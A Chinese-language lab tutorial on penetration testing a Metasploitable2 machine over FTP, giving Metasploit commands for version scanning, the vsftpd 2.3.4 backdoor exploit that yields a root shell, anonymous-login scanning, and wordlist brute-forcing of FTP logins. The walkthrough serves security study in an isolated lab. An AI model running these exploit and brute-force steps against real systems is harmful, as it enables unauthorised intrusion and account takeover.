实验内网渗透环境
Metasploitable2-linux:靶机 192.168.234.8
kali-debian:攻击机 192.168.234.141
win7 虚拟机:靶机 192.168.234.158
在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!
基于FTP协议收集信息 ——Metasploitable2-linux
FTP(File Transfer Protocol,文件传输协议)是用于在计算机网络上进行文件传输的标准网络协议,客户端-服务器协议允许用户从一个计算机向另一个计算机传输文件。端口号21
本次实验步骤和成果:
1、
a、利用auxiliary(scanner/ftp/ftp_version)模块扫描FTP服务协议版本信息是2.3.4
b、通过ftp版本号信息得到ftp的exploit/unix/ftp/vsftpd_234_backdoor攻击模块,
c、利用这个exploit/unix/ftp/vsftpd_234_backdoor模块攻击linux,可得到root权限的shell
2、利用auxiliary(scanner/ftp/anonymous)进行匿名登录扫描,发现是任何人可成功登录
---检测FTP服务器是否允许匿名用户登录,并查看可用的匿名用户权限
---结果包括:
成功登录:任何人都可匿名登录到ftp服务器,并访问其中文件和目录
拒绝登录:不允许匿名用户登录
制度权限:只读方式访问文件和目录--可下载文件,但无法上传、删除或修改文件
读写权限:以读写方式访问文件和目录 --可上传、下载、删除或修改文件
3、利用auxiliary(scanner/ftp/ftp_login)模块进行暴力
a、开启kali新窗口,手动加入linux用户和密码到字典 ——以便展示效果
b、ssh_login模块中set创建字典文件对象(设置字典——暴力破解依赖于字典文件)
c、run,发现ftp登录信息,登录失败,不能登录靶机的ftp服务器 ——进行遍历暴力破解
auxiliary(scanner/ftp/ftp_login)模块使用了一个字典文件,其中包含了常见的用户名和密码组合,或者用户可以指定自定义的字典文件。模块将遍历字典中的每个用户名和密码组合,并通过FTP协议尝试登录到目标FTP服务器。以获取FTP服务器的非法访问权限。
暴力破解 ——不停发送数据和收到响应包,如果有有效的密码就可以进行登录
Shell:常指操作系统提供的命令行界面,得到后可进行一系列命令行操作,如ifconfig等
(1)ftp 获取靶机shell
msf6 > use auxiliary/scanner/ftp/ftp_version ——加载 ftp 服务版本扫描模块
msf6 auxiliary(scanner/ftp/ftp_version) > show options ——查看设置参数
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.234.8
——输入exploit或run,可设置多个靶机
msf6 auxiliary(scanner/ftp/ftp_version) > run
——执行扫描,扫描出版本信息是:vsFTPd 2.3.4
msf6 > search 2.3.4 ——搜索版本号,查看是否有可以利用的模块
msf6 > search vsftpd ——或者直接搜索vsftpd(very secure FTP daemon--ftp服务器软件)
---发现存在一个 exploit 模块==》这个版本的 ftp 服务存在一个后门
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor ——加载利用exploit模块
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options ——查看设置参数
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.234.8
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run ——得到root权限的shell
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > id ——查看用户
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > ifconfig ——查看 IP 地址
(2)ftp 匿名登录扫描
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) show options
msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.234.8
msf6 auxiliary(scanner/ftp/anonymous) > run
(3)ftp 暴力破解
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.234.8
——设置字典文件默认的字典文件是不满足实际需求,后期我们使用更强大的字典文件。
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
——因为字典文件中不包含我们的用户密码信息==》把自己的密码信息手动加入进去以便展示效果
新开一个终端窗口
root@zwzj:~# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > run ——回到 MSF 终端